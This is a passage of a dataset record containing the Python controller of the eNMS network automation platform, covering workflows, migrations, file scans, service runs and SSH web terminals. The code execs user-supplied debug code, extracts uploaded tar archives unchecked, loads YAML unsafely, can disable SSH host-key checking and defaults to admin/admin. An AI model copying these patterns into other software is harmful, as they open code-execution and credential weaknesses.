}\n\n def get_session_log(self, session_id):\n return db.fetch(\"session\", id=session_id).content\n\n def get_network_state(self, path, runtime=None):\n network = db.fetch(\"network\", id=path.split(\">\")[-1], allow_none=True)\n if not network:\n raise db.rbac_error\n return {\n \"network\": network.to_dict(include=[\"nodes\", \"links\"]),\n \"device_results\": {\n result.device_id: result.success\n for result in db.fetch_all(\"result\", parent_runtime=runtime)\n if result.device_id\n },\n }\n\n def get_top_level_instances(self, type):\n result = defaultdict(list)\n constraints = [~getattr(vs.models[type], f\"{type}s\").any()]\n if type == \"workflow\":\n constraints.append(vs.models[type].shared == true())\n properties = [\"id\", \"category\", \"name\"]\n for instance in (\n db.query(type, properties=properties).filter(or_(*constraints)).all()\n ):\n entry = dict(zip(properties, instance))\n result[instance.category or \"Other\"].append(entry)\n return result\n\n def scan_folder(self, path=\"\"):\n env.log(\"info\", \"Starting Scan of Files\")\n path = f\"{vs.file_path}{path.replace('>', '/')}\"\n if not exists(path):\n return {\"alert\": \"This folder does 
not exist on the filesystem.\"}\n folders = {Path(path)}\n files_set = {\n file\n for file in db.session.query(vs.models[\"file\"])\n .filter(vs.models[\"file\"].full_path.startswith(path))\n .all()\n }\n for file in files_set:\n if not exists(file.full_path):\n file.status = \"Not Found\"\n file_path_set = {file.full_path for file in files_set}\n while folders:\n folder = folders.pop()\n for file in folder.iterdir():\n if str(file) in file_path_set:\n continue\n elif file.suffix in vs.settings[\"files\"][\"ignored_types\"]:\n continue\n elif file.is_dir():\n folders.add(file)\n scoped_path = str(file).replace(str(vs.file_path), \"\")\n db.factory(\"folder\" if file.is_dir() else \"file\", path=scoped_path)\n db.session.commit()\n env.log(\"info\", \"Scan of Files Successful\")\n\n def get_visualization_pools(self, view):\n has_device = vs.models[\"pool\"].devices.any()\n has_link = vs.models[\"pool\"].links.any()\n pools = db.query(\"pool\").filter(or_(has_device, has_link)).all()\n return [pool.base_properties for pool in pools]\n\n def get_workflow_results(self, path, runtime):\n run = db.fetch(\"run\", runtime=runtime)\n service = db.fetch(\"service\", id=path.split(\">\")[-1])\n state = run.state\n\n def rec(service, path):\n if path not in state:\n return\n progress = state[path].get(\"progress\")\n track_progress = progress and progress[\"device\"][\"total\"]\n data = {\"progress\": progress[\"device\"]} if track_progress else {}\n color = \"32CD32\" if state[path][\"result\"][\"success\"] else \"FF6666\"\n result = {\n \"runtime\": state[path][\"result\"][\"runtime\"],\n \"data\": {\"properties\": service.base_properties, **data},\n \"text\": service.scoped_name,\n \"a_attr\": {\"style\": f\"color: #{color};width: 100%\"},\n }\n if service.type == \"workflow\":\n children_results = []\n for child in service.services:\n if child.scoped_name == \"Placeholder\":\n child = run.placeholder\n child_results = rec(child, f\"{path}>{child.id}\")\n if not child_results:\n continue\n children_results.append(child_results)\n return {\n \"children\": sorted(children_results, key=itemgetter(\"runtime\")),\n **result,\n }\n else:\n return result\n\n return rec(service, path)\n\n def get_workflow_services(self, id, node):\n parents = db.fetch(\"workflow\", id=id).get_ancestors()\n if node == \"all\":\n workflows = self.filtering(\n \"workflow\", bulk=\"object\", constraints={\"workflows_filter\": \"empty\"}\n )\n return (\n [\n {\n \"data\": {\"id\": \"standalone\"},\n \"id\": \"standalone\",\n \"text\": \"Standalone services\",\n \"children\": True,\n \"state\": {\"disabled\": True},\n \"a_attr\": {\n \"class\": \"no_checkbox\",\n \"style\": \"color: #000000; width: 100%\",\n },\n \"type\": \"category\",\n }\n ]\n + [\n {\n \"data\": {\"id\": \"shared\"},\n \"id\": \"shared\",\n \"text\": \"Shared services\",\n \"children\": True,\n \"state\": {\"disabled\": True},\n \"a_attr\": {\n \"class\": \"no_checkbox\",\n \"style\": \"color: #FF1694; width: 100%\",\n },\n \"type\": \"category\",\n }\n ]\n + sorted(\n (\n {\n \"id\": workflow.name,\n \"data\": {\"id\": workflow.id},\n \"text\": workflow.name,\n \"children\": True,\n \"type\": \"workflow\",\n \"state\": {\"disabled\": workflow in parents},\n \"a_attr\": {\n \"class\": \"no_checkbox\" if workflow in parents else \"\",\n \"style\": \"color: #6666FF; width: 100%\",\n },\n }\n for workflow in workflows\n ),\n key=itemgetter(\"text\"),\n )\n )\n elif node == \"standalone\":\n constraints = {\"workflows_filter\": \"empty\", \"type\": 
\"service\"}\n services = self.filtering(\"service\", bulk=\"object\", constraints=constraints)\n return sorted(\n (\n {\n \"data\": {\"id\": service.id},\n \"text\": service.scoped_name,\n \"a_attr\": {\"style\": (\"color: #6666FF;\" \"width: 100%\")},\n }\n for service in services\n ),\n key=itemgetter(\"text\"),\n )\n elif node == \"shared\":\n constraints = {\"shared\": \"bool-true\"}\n services = self.filtering(\"service\", bulk=\"object\", constraints=constraints)\n return sorted(\n (\n {\n \"data\": {\"id\": service.id},\n \"text\": service.scoped_name,\n \"a_attr\": {\"style\": (\"color: #FF1694;\" \"width: 100%\")},\n }\n for service in services\n if service.scoped_name not in (\"Start\", \"End\")\n ),\n key=itemgetter(\"text\"),\n )\n else:\n return sorted(\n (\n {\n \"data\": {\"id\": service.id},\n \"text\": service.scoped_name,\n \"children\": service.type == \"workflow\",\n \"type\": \"workflow\" if service.type == \"workflow\" else \"service\",\n \"state\": {\"disabled\": service in parents},\n \"a_attr\": {\n \"class\": \"no_checkbox\" if service in parents else \"\",\n \"style\": (\n f\"color: #{'FF1694' if service.shared else '6666FF'};\"\n \"width: 100%\"\n ),\n },\n }\n for service in db.fetch(\"workflow\", id=node).services\n if service.scoped_name not in (\"Start\", \"End\")\n ),\n key=itemgetter(\"text\"),\n )\n\n def get_instance_tree(self, type, full_path):\n path_id = full_path.split(\">\")\n\n def rec(instance, path=\"\"):\n path += \">\" * bool(path) + str(instance.id)\n if type == \"workflow\":\n if instance.scoped_name in (\"Start\", \"End\"):\n return\n elif instance.scoped_name == \"Placeholder\" and len(path_id) > 1:\n instance = db.fetch(type, id=path_id[1])\n child_property = \"nodes\" if type == \"network\" else \"services\"\n color = \"FF1694\" if getattr(instance, \"shared\", False) else \"6666FF\"\n return {\n \"data\": {\"path\": path, **instance.base_properties},\n \"id\": instance.id,\n \"state\": {\"opened\": full_path.startswith(path)},\n \"text\": instance.scoped_name if type == \"workflow\" else instance.name,\n \"children\": sorted(\n filter(\n None,\n [\n rec(child, path)\n for child in getattr(instance, child_property)\n ],\n ),\n key=lambda node: node[\"text\"].lower(),\n )\n if instance.type == type\n else False,\n \"a_attr\": {\n \"class\": \"no_checkbox\",\n \"style\": f\"color: #{color}; width: 100%\",\n },\n \"type\": instance.type,\n }\n\n return rec(db.fetch(type, id=path_id[0]))\n\n def load_debug_snippets(self):\n snippets = {}\n for path in Path(vs.file_path / \"snippets\").glob(\"**/*.py\"):\n with open(path, \"r\") as file:\n snippets[path.name] = file.read()\n return snippets\n\n def migration_export(self, **kwargs):\n for cls_name in kwargs[\"import_export_types\"]:\n path = Path(vs.migration_path) / kwargs[\"name\"]\n if not exists(path):\n makedirs(path)\n with open(path / f\"{cls_name}.yaml\", \"w\") as migration_file:\n yaml.dump(\n db.export(\n cls_name,\n private_properties=kwargs[\"export_private_properties\"],\n ),\n migration_file,\n default_style='\"',\n )\n with open(path / \"metadata.yaml\", \"w\") as file:\n yaml.dump(\n {\n \"version\": vs.server_version,\n \"export_time\": datetime.now(),\n },\n file,\n )\n\n def migration_import(self, folder=\"migrations\", **kwargs):\n env.log(\"info\", \"Starting Migration Import\")\n env.log_events = False\n status, models = \"Import successful\", kwargs[\"import_export_types\"]\n empty_database = kwargs.get(\"empty_database_before_import\", False)\n service_import = 
kwargs.get(\"service_import\", False)\n if empty_database:\n db.delete_all(*models)\n relations, store = defaultdict(lambda: defaultdict(dict)), defaultdict(dict)\n start_time = datetime.now()\n folder_path = (\n Path(vs.migration_path) / kwargs[\"name\"]\n if folder == \"migrations\"\n else vs.file_path / folder / kwargs[\"name\"]\n )\n with open(folder_path / \"metadata.yaml\", \"r\") as metadata_file:\n metadata = yaml.load(metadata_file, Loader=yaml.SafeLoader)\n if service_import and metadata[\"version\"] != vs.server_version:\n return {\"alert\": \"Import from an older version is not allowed\"}\n if current_user:\n store[\"user\"][current_user.name] = current_user\n for service_name in (\"Start\", \"End\", \"Placeholder\"):\n service = db.fetch(\n \"service\", name=f\"[Shared] {service_name}\", allow_none=True\n )\n if service:\n store[\"swiss_army_knife_service\"][service.name] = service\n store[\"service\"][service.name] = service\n for model in models:\n path = folder_path / f\"{model}.yaml\"\n if not path.exists():\n if service_import and model == \"service\":\n raise Exception(\"Invalid archive provided in service import.\")\n continue\n with open(path, \"r\") as migration_file:\n instances = yaml.load(migration_file, Loader=yaml.CLoader)\n before_time = datetime.now()\n env.log(\"info\", f\"Creating {model}s\")\n for instance in instances:\n type, relation_dict = instance.pop(\"type\", model), {}\n for related_model, relation in vs.relationships[type].items():\n relation_dict[related_model] = instance.pop(related_model, [])\n instance_private_properties = {\n property: env.get_password(instance.pop(property))\n for property in list(instance)\n if property in vs.private_properties_set\n }\n try:\n if instance[\"name\"] in store[model]:\n instance = store[model][instance[\"name\"]]\n else:\n instance = db.factory(\n type,\n migration_import=True,\n no_fetch=empty_database,\n import_mechanism=True,\n **instance,\n )\n store[model][instance.name] = instance\n store[type][instance.name] = store[model][instance.name]\n if model in (\"device\", \"network\"):\n store[\"node\"][instance.name] = store[model][instance.name]\n if service_import:\n if instance.type == \"workflow\":\n instance.edges = []\n relations[type][instance.name] = relation_dict\n for property in instance_private_properties.items():\n setattr(instance, *property)\n except Exception:\n info(f\"{str(instance)} could not be imported:\\n{format_exc()}\")\n if service_import:\n db.session.rollback()\n return \"Error during import; service was not imported.\"\n status = {\"alert\": \"partial import (see logs).\"}\n db.session.commit()\n total_time = datetime.now() - before_time\n env.log(\"info\", f\"{model.capitalize()}s created in {total_time}\")\n for model, instances in relations.items():\n env.log(\"info\", f\"Setting up {model}s database relationships\")\n before_time = datetime.now()\n for instance_name, related_models in instances.items():\n for property, value in related_models.items():\n if not value:\n continue\n relation = vs.relationships[model][property]\n if relation[\"list\"]:\n sql_value = []\n for name in value:\n if name not in store[relation[\"model\"]]:\n related_instance = db.fetch(\n relation[\"model\"], name=name, allow_none=True\n )\n if related_instance:\n store[relation[\"model\"]][name] = related_instance\n if name in store[relation[\"model\"]]:\n sql_value.append(store[relation[\"model\"]][name])\n else:\n if value not in store[relation[\"model\"]]:\n related_instance = db.fetch(\n 
relation[\"model\"], name=value, allow_none=True\n )\n if related_instance:\n store[relation[\"model\"]][value] = related_instance\n sql_value = store[relation[\"model\"]][value]\n try:\n setattr(store[model].get(instance_name), property, sql_value)\n except Exception:\n info(\"\\n\".join(format_exc().splitlines()))\n if service_import:\n db.session.rollback()\n return \"Error during import; service was not imported.\"\n status = {\"alert\": \"Partial Import (see logs).\"}\n env.log(\"info\", f\"Relationships created in {datetime.now() - before_time}\")\n db.session.commit()\n if service_import:\n service = store[\"service\"][metadata[\"service\"]]\n if service.type == \"workflow\":\n service.recursive_update()\n if not kwargs.get(\"skip_model_update\"):\n before_time = datetime.now()\n env.log(\"info\", \"Starting model update\")\n for model in (\"user\", \"service\", \"network\"):\n for instance in store[model].values():\n instance.post_update()\n env.log(\"info\", f\"Model update done ({datetime.now() - before_time}s)\")\n if not kwargs.get(\"skip_pool_update\"):\n before_time = datetime.now()\n env.log(\"info\", \"Starting pool update\")\n for pool in store[\"pool\"].values():\n pool.compute_pool()\n env.log(\"info\", f\"Pool update done ({datetime.now() - before_time}s)\")\n db.session.commit()\n env.log_events = True\n env.log(\"info\", f\"{status} (execution time: {datetime.now() - start_time}s)\")\n return status\n\n def multiselect_filtering(self, model, **params):\n table = vs.models[model]\n query = db.query(model).filter(table.name.contains(params.get(\"term\")))\n query = self.filtering_relationship_constraints(query, model, **params)\n query = query.filter(and_(*self.filtering_base_constraints(model, **params)))\n property = \"name\" if params[\"multiple\"] else \"id\"\n button_html = \"type='button' class='btn btn-link btn-select2'\"\n return {\n \"items\": [\n {\n \"text\": f\"\",\n \"id\": getattr(result, property),\n }\n for result in query.limit(10)\n .offset((int(params[\"page\"]) - 1) * 10)\n .all()\n ],\n \"total_count\": query.count(),\n }\n\n def import_services(self, **kwargs):\n file = kwargs[\"file\"]\n filepath = vs.file_path / \"services\" / file.filename\n (vs.file_path / \"services\").mkdir(parents=True, exist_ok=True)\n file.save(str(filepath))\n with open_tar(filepath) as tar_file:\n tar_file.extractall(path=vs.file_path / \"services\")\n folder_name = tar_file.getmembers()[0].name\n status = self.migration_import(\n folder=\"services\",\n name=folder_name,\n import_export_types=[\"service\", \"workflow_edge\"],\n service_import=True,\n skip_pool_update=True,\n skip_model_update=True,\n )\n rmtree(vs.file_path / \"services\" / folder_name, ignore_errors=True)\n if \"Error during import\" in status:\n raise Exception(status)\n return status\n\n def import_topology(self, **kwargs):\n file = kwargs[\"file\"]\n if kwargs[\"replace\"]:\n db.delete_all(\"device\")\n result = self.topology_import(file)\n info(\"Inventory import: Done.\")\n return result\n\n def objectify(self, model, instance):\n for property, relation in vs.relationships[model].items():\n if property not in instance:\n continue\n elif relation[\"list\"]:\n instance[property] = [\n db.fetch(relation[\"model\"], name=name).id\n for name in instance[property]\n ]\n else:\n instance[property] = db.fetch(\n relation[\"model\"], name=instance[property]\n ).id\n return instance\n\n def remove_instance(self, **kwargs):\n instance = db.fetch(kwargs[\"instance\"][\"type\"], 
id=kwargs[\"instance\"][\"id\"])\n target = db.fetch(kwargs[\"relation\"][\"type\"], id=kwargs[\"relation\"][\"id\"])\n if target.type == \"pool\" and not target.manually_defined:\n return {\"alert\": \"Removing an object from a dynamic pool is an allowed.\"}\n relationship_property = getattr(target, kwargs[\"relation\"][\"relation\"][\"to\"])\n if instance in relationship_property:\n relationship_property.remove(instance)\n else:\n return {\"alert\": f\"{instance.name} is not associated with {target.name}.\"}\n\n def result_log_deletion(self, **kwargs):\n date_time_object = datetime.strptime(kwargs[\"date_time\"], \"%d/%m/%Y %H:%M:%S\")\n date_time_string = date_time_object.strftime(\"%Y-%m-%d %H:%M:%S.%f\")\n for model in kwargs[\"deletion_types\"]:\n if model == \"run\":\n field_name = \"runtime\"\n elif model == \"changelog\":\n field_name = \"time\"\n session_query = db.session.query(vs.models[model]).filter(\n getattr(vs.models[model], field_name) < date_time_string\n )\n session_query.delete(synchronize_session=False)\n db.session.commit()\n\n @staticmethod\n @actor(max_retries=0, time_limit=float(\"inf\"))\n def run(service, **kwargs):\n current_thread().name = kwargs[\"runtime\"]\n if \"path\" not in kwargs:\n kwargs[\"path\"] = str(service)\n keys = list(vs.model_properties[\"run\"]) + list(vs.relationships[\"run\"])\n run_kwargs = {key: kwargs.pop(key) for key in keys if kwargs.get(key)}\n for property in (\"name\", \"labels\"):\n if property in kwargs.get(\"form\", {}):\n run_kwargs[property] = kwargs[\"form\"][property]\n service = db.fetch(\"service\", id=service, rbac=\"run\")\n service.status = \"Running\"\n initial_payload = {\n **service.initial_payload,\n **kwargs.get(\"form\", {}).get(\"initial_payload\", {}),\n }\n restart_runtime = kwargs.get(\"restart_runtime\")\n restart_run = db.fetch(\"run\", allow_none=True, runtime=restart_runtime)\n if service.type == \"workflow\" and service.superworkflow and not restart_run:\n run_kwargs[\"placeholder\"] = run_kwargs[\"start_service\"] = service.id\n run_kwargs[\"path\"] = str(service.superworkflow.id)\n service = service.superworkflow\n initial_payload.update(service.initial_payload)\n else:\n run_kwargs[\"start_service\"] = service.id\n if restart_run:\n run_kwargs[\"restart_run\"] = restart_run.id\n initial_payload = restart_run.payload\n run_kwargs[\"services\"] = [service.id]\n service.last_run = vs.get_time()\n run = db.factory(\n \"run\", service=service.id, commit=True, rbac=None, **run_kwargs\n )\n run.properties, run.payload = kwargs, {**initial_payload, **kwargs}\n return run.run()\n\n def run_debug_code(self, **kwargs):\n result = StringIO()\n with redirect_stdout(result):\n try:\n exec(\n kwargs[\"code\"],\n {\n \"controller\": self,\n \"env\": env,\n \"db\": db,\n \"models\": vs.models,\n \"vs\": vs,\n },\n )\n except Exception:\n return format_exc()\n return result.getvalue()\n\n def run_service(self, path, **kwargs):\n if \"application\" not in vs.server_data[\"allowed_automation\"]:\n return {\"error\": \"Runs from the UI are not allowed on this server.\"}\n if isinstance(kwargs.get(\"start_services\"), str):\n kwargs[\"start_services\"] = kwargs[\"start_services\"].split(\"-\")\n service_id = str(path).split(\">\")[-1]\n for property in (\"user\", \"csrf_token\"):\n kwargs.pop(property, None)\n if kwargs.get(\"form_type\", \"\").startswith(\"initial-\"):\n kwargs = {\"form\": kwargs, \"parameterized_run\": True}\n kwargs.update({\"creator\": getattr(current_user, \"name\", \"\"), \"path\": path})\n service = 
db.fetch(\"service\", id=service_id, rbac=\"run\")\n if service.disabled:\n return {\"error\": \"The workflow is disabled.\"}\n service.check_restriction_to_owners(\"run\")\n kwargs[\"runtime\"] = runtime = vs.get_time()\n run_name = kwargs.get(\"form\", {}).get(\"name\")\n if run_name and db.fetch(\"run\", name=run_name, allow_none=True, rbac=None):\n return {\"error\": \"There is already a run with the same name.\"}\n if kwargs.get(\"asynchronous\", True):\n if vs.settings[\"automation\"][\"use_task_queue\"]:\n self.run.send(service_id, **kwargs)\n else:\n Thread(target=self.run, args=(service_id,), kwargs=kwargs).start()\n else:\n service.run(runtime=runtime)\n return {\n \"service\": service.serialized,\n \"runtime\": runtime,\n \"restart\": \"restart_runtime\" in kwargs,\n \"user\": current_user.name,\n }\n\n def run_service_on_targets(self, **kwargs):\n return self.run_service(\n kwargs[\"service\"],\n **{f\"target_{kwargs['type']}s\": kwargs[\"targets\"].split(\"-\")},\n )\n\n def save_file(self, filepath, **kwargs):\n scoped_path, content = filepath.replace(\">\", \"/\"), None\n if kwargs.get(\"file_content\"):\n with open(f\"{vs.file_path}{scoped_path}\", \"w\") as file:\n content = file.write(kwargs[\"file_content\"])\n db.fetch(\"file\", path=scoped_path).update()\n return content\n\n def save_positions(self, type, id, **kwargs):\n now = vs.get_time()\n instance = db.fetch(type, allow_none=True, id=id, rbac=\"edit\")\n if not instance:\n return\n relation_type = \"node\" if type == \"network\" else \"service\"\n for id, position in kwargs.items():\n new_position = [position[\"x\"], position[\"y\"]]\n if \"-\" not in id:\n relation = db.fetch(relation_type, id=id, rbac=None)\n relation.positions[instance.name] = new_position\n elif id in instance.labels:\n instance.labels[id] = {**instance.labels[id], \"positions\": new_position}\n return now\n\n def save_profile(self, **kwargs):\n allow_password_change = vs.settings[\"authentication\"][\"allow_password_change\"]\n if not allow_password_change or current_user.authentication != \"database\":\n kwargs.pop(\"password\", None)\n current_user.update(**kwargs)\n\n def save_settings(self, **kwargs):\n vs.settings = vs.template_context[\"settings\"] = kwargs[\"settings\"]\n if kwargs[\"save\"]:\n with open(vs.path / \"setup\" / \"settings.json\", \"w\") as file:\n dump(kwargs[\"settings\"], file, indent=2)\n\n def scan_cluster(self, **kwargs):\n protocol = vs.settings[\"cluster\"][\"scan_protocol\"]\n for ip_address in IPv4Network(vs.settings[\"cluster\"][\"scan_subnet\"]):\n try:\n server = http_get(\n f\"{protocol}://{ip_address}/rest/is_alive\",\n timeout=vs.settings[\"cluster\"][\"scan_timeout\"],\n ).json()\n if vs.settings[\"cluster\"][\"id\"] != server.pop(\"cluster_id\"):\n continue\n db.factory(\"server\", **{**server, **{\"ip_address\": str(ip_address)}})\n except ConnectionError:\n continue\n\n def scan_playbook_folder(self):\n playbooks = [\n [\n str(file).replace(str(vs.playbook_path), \"\")\n for file in Path(vs.playbook_path).glob(extension)\n ]\n for extension in (\"*.yaml\", \"*.yml\")\n ]\n return sorted(sum(playbooks, []))\n\n def scheduler_action(self, mode, **kwargs):\n for task in self.filtering(\"task\", properties=[\"id\"], form=kwargs):\n self.task_action(mode, task.id)\n\n def search_builder(self, type, id, text):\n property = \"nodes\" if type == \"network\" else \"services\"\n return [\n node.id\n for node in getattr(db.fetch(type, id=id), property)\n if text.lower() in 
str(node.get_properties().values()).lower()\n ]\n\n def search_workflow_services(self, **kwargs):\n service_alias = aliased(vs.models[\"service\"])\n workflows = [\n workflow.name\n for workflow in db.query(\"workflow\", properties=[\"name\"])\n .join(service_alias, vs.models[\"workflow\"].services)\n .filter(service_alias.scoped_name.contains(kwargs[\"str\"].lower()))\n .distinct()\n .all()\n ]\n return [\"standalone\", \"shared\", *workflows]\n\n def skip_services(self, workflow_id, service_ids):\n services = [db.fetch(\"service\", id=id) for id in service_ids.split(\"-\")]\n workflow = db.fetch(\"workflow\", id=workflow_id, rbac=\"edit\")\n workflow.check_restriction_to_owners(\"edit\")\n skip = not all(service.skip.get(workflow.name) for service in services)\n for service in services:\n service.skip[workflow.name] = skip\n workflow.update_last_modified_properties()\n return {\n \"skip\": \"skip\" if skip else \"unskip\",\n \"update_time\": workflow.last_modified,\n }\n\n def stop_run(self, runtime):\n run = db.fetch(\"run\", allow_none=True, runtime=runtime)\n if run and run.status == \"Running\":\n if env.redis_queue:\n env.redis(\"set\", f\"stop/{runtime}\", \"true\")\n else:\n vs.run_stop[runtime] = True\n return True\n\n def switch_menu(self, user_id):\n user = db.fetch(\"user\", rbac=None, id=user_id)\n user.small_menu = not user.small_menu\n\n def switch_theme(self, user_id, theme):\n db.fetch(\"user\", rbac=None, id=user_id).theme = theme\n\n def task_action(self, mode, task_id):\n return db.fetch(\"task\", id=task_id, rbac=\"edit\").schedule(mode)\n\n def topology_export(self, **kwargs):\n workbook = Workbook()\n filename = kwargs[\"export_filename\"]\n if \".\" not in filename:\n filename += \".xls\"\n for obj_type in (\"device\", \"link\"):\n sheet = workbook.add_sheet(obj_type)\n for index, property in enumerate(vs.model_properties[obj_type]):\n if property in db.dont_migrate[obj_type]:\n continue\n sheet.write(0, index, property)\n for obj_index, obj in enumerate(db.fetch_all(obj_type), 1):\n value = getattr(obj, property)\n if type(value) == bytes:\n value = str(env.decrypt(value), \"utf-8\")\n sheet.write(obj_index, index, str(value))\n workbook.save(vs.file_path / \"spreadsheets\" / filename)\n\n def topology_import(self, file):\n book = open_workbook(file_contents=file.read())\n status = \"Topology successfully imported.\"\n for obj_type in (\"device\", \"link\"):\n try:\n sheet = book.sheet_by_name(obj_type)\n except XLRDError:\n continue\n properties = sheet.row_values(0)\n for row_index in range(1, sheet.nrows):\n values = {}\n for index, property in enumerate(properties):\n if not property:\n continue\n property_type = vs.model_properties[obj_type].get(property, \"str\")\n func = db.field_conversion[property_type]\n values[property] = func(sheet.row_values(row_index)[index])\n try:\n db.factory(obj_type, **values).serialized\n except Exception as exc:\n info(f\"{str(values)} could not be imported ({str(exc)})\")\n status = \"Partial import (see logs).\"\n db.session.commit()\n for pool in db.fetch_all(\"pool\", rbac=\"edit\"):\n pool.compute_pool()\n env.log(\"info\", status)\n return status\n\n def update(self, type, **kwargs):\n try:\n kwargs[\"must_be_new\"] = kwargs.get(\"id\") == \"\"\n for arg in (\"name\", \"scoped_name\"):\n if arg in kwargs:\n kwargs[arg] = kwargs[arg].strip()\n if kwargs[\"must_be_new\"]:\n kwargs[\"creator\"] = kwargs[\"user\"] = getattr(current_user, \"name\", \"\")\n for builder_type in (\"workflow\", \"network\"):\n if not 
kwargs.get(f\"{builder_type}s\"):\n continue\n builder_id = kwargs[f\"{builder_type}s\"][0]\n db.fetch(builder_type, id=builder_id, rbac=\"edit\")\n instance = db.factory(type, **kwargs)\n if kwargs.get(\"copy\"):\n db.fetch(type, id=kwargs[\"copy\"]).duplicate(clone=instance)\n db.session.flush()\n return instance.post_update()\n except db.rbac_error:\n return {\"alert\": \"Error 403 - Not Authorized.\"}\n except Exception as exc:\n db.session.rollback()\n if isinstance(exc, IntegrityError):\n alert = (\n f\"There is already a {instance.class_type} \"\n \"with the same parameters.\"\n )\n return {\"alert\": alert}\n env.log(\"error\", format_exc())\n return {\"alert\": str(exc)}\n\n def update_all_pools(self):\n for pool in db.fetch_all(\"pool\", rbac=\"edit\"):\n pool.compute_pool()\n\n def update_database_configurations_from_git(self, force_update=False):\n path = vs.path / \"network_data\"\n env.log(\"info\", f\"Updating device configurations with data from {path}\")\n for dir in scandir(path):\n device = db.fetch(\"device\", allow_none=True, name=dir.name)\n timestamp_path = Path(dir.path) / \"timestamps.json\"\n if not device:\n continue\n try:\n with open(timestamp_path) as file:\n timestamps = load(file)\n except Exception:\n timestamps = {}\n for property in vs.configuration_properties:\n no_update = False\n for timestamp, value in timestamps.get(property, {}).items():\n if timestamp == \"update\":\n db_date = getattr(device, f\"last_{property}_update\")\n if db_date != \"Never\" and not force_update:\n no_update = vs.str_to_date(value) <= vs.str_to_date(db_date)\n setattr(device, f\"last_{property}_{timestamp}\", value)\n filepath = Path(dir.path) / property\n if not filepath.exists() or no_update:\n continue\n with open(filepath) as file:\n setattr(device, property, file.read())\n db.session.commit()\n for pool in db.fetch_all(\"pool\"):\n if any(\n getattr(pool, f\"device_{property}\")\n for property in vs.configuration_properties\n ):\n pool.compute_pool()\n db.session.commit()\n\n def update_device_rbac(self):\n for group in db.fetch_all(\"group\"):\n for property in vs.rbac[\"rbac_models\"][\"device\"]:\n pool_property = getattr(vs.models[\"pool\"], f\"rbac_group_{property}\")\n devices = (\n db.query(\"device\")\n .join(vs.models[\"device\"].pools)\n .join(vs.models[\"group\"], pool_property)\n .filter(vs.models[\"group\"].id == group.id)\n .all()\n )\n setattr(group, f\"{property}_devices\", devices)\n\n def upload_files(self, **kwargs):\n path = f\"{vs.file_path}/{kwargs['folder']}/{kwargs['file'].filename}\"\n kwargs[\"file\"].save(path)\n\n def update_pool(self, pool_id):\n db.fetch(\"pool\", id=int(pool_id), rbac=\"edit\").compute_pool()\n\n def view_filtering(self, **kwargs):\n return {\n f\"{model}s\": self.filtering(model, **form, bulk=\"view_properties\")\n for model, form in kwargs.items()\n }\n\n def web_connection(self, device_id, **kwargs):\n if not vs.settings[\"ssh\"][\"credentials\"][kwargs[\"credentials\"]]:\n return {\"alert\": \"Unauthorized authentication method.\"}\n device = db.fetch(\"device\", id=device_id, rbac=\"connect\")\n port, endpoint = env.get_ssh_port(), str(uuid4())\n command = f\"{vs.settings['ssh']['command']} -p {port}\"\n if vs.settings[\"ssh\"][\"bypass_key_prompt\"]:\n options = \"-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null\"\n else:\n options = \"\"\n environment = {\n **{key: str(value) for key, value in vs.settings[\"ssh\"][\"web\"].items()},\n \"APP_ADDRESS\": getenv(\"SERVER_URL\", \"https://0.0.0.0\"),\n 
\"DEVICE\": str(device.id),\n \"ENDPOINT\": endpoint,\n \"ENMS_USER\": getenv(\"ENMS_USER\", \"admin\"),\n \"ENMS_PASSWORD\": getenv(\"ENMS_PASSWORD\", \"admin\"),\n \"FLASK_APP\": \"app.py\",\n \"IP_ADDRESS\": getattr(device, kwargs[\"address\"]),\n \"OPTIONS\": options,\n \"PORT\": str(device.port),\n \"PROTOCOL\": kwargs[\"protocol\"],\n \"REDIRECTION\": str(vs.settings[\"ssh\"][\"port_redirection\"]),\n \"USER\": current_user.name,\n }\n if \"authentication\" in kwargs:\n credentials = self.get_credentials(device, optional=True, **kwargs)\n if not credentials:\n return {\"alert\": f\"No credentials found for '{device.name}'.\"}\n environment.update(zip((\"USERNAME\", \"PASSWORD\"), credentials))\n Popen(command, shell=True, cwd=vs.path / \"terminal\", env=environment)\n return {\n \"device\": device.name,\n \"port\": port,\n \"endpoint\": endpoint,\n \"redirection\": vs.settings[\"ssh\"][\"port_redirection\"],\n }\n\n\ncontroller = Controller()\n", "repo_name": "eNMS-automation/eNMS", "sub_path": "eNMS/controller.py", "file_name": "controller.py", "file_ext": "py", "file_size_in_byte": 66938, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 780, "dataset": "github-code", "pt": "52", "api": [{"api_name": "eNMS.variables.vs.settings", "line_number": 45, "usage_type": "attribute"}, {"api_name": "eNMS.variables.vs", "line_number": 45, "usage_type": "name"}, {"api_name": "eNMS.database.db.import_export_models", "line_number": 46, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 46, "usage_type": "name"}, {"api_name": "functools.wraps", "line_number": 54, "usage_type": "call"}, {"api_name": "eNMS.database.db.fetch", "line_number": 61, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 61, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 66, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 66, "usage_type": "name"}, {"api_name": "eNMS.database.db.session.commit", "line_number": 74, "usage_type": "call"}, {"api_name": "eNMS.database.db.session", "line_number": 74, "usage_type": "attribute"}, {"api_name": "eNMS.database.db", "line_number": 74, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 78, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 78, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 82, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 82, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 85, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 85, "usage_type": "name"}, {"api_name": "eNMS.variables.vs.get_time", "line_number": 92, "usage_type": "call"}, {"api_name": "eNMS.variables.vs", "line_number": 92, "usage_type": "name"}, {"api_name": "flask_login.current_user.name", "line_number": 93, "usage_type": "attribute"}, {"api_name": "flask_login.current_user", "line_number": 93, "usage_type": "name"}, {"api_name": "eNMS.database.db.fetch", "line_number": 97, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 97, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 99, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 99, "usage_type": "name"}, {"api_name": "eNMS.database.db.objectify", "line_number": 100, "usage_type": "call"}, {"api_name": "eNMS.database.db", "line_number": 100, "usage_type": "name"}, {"api_name": 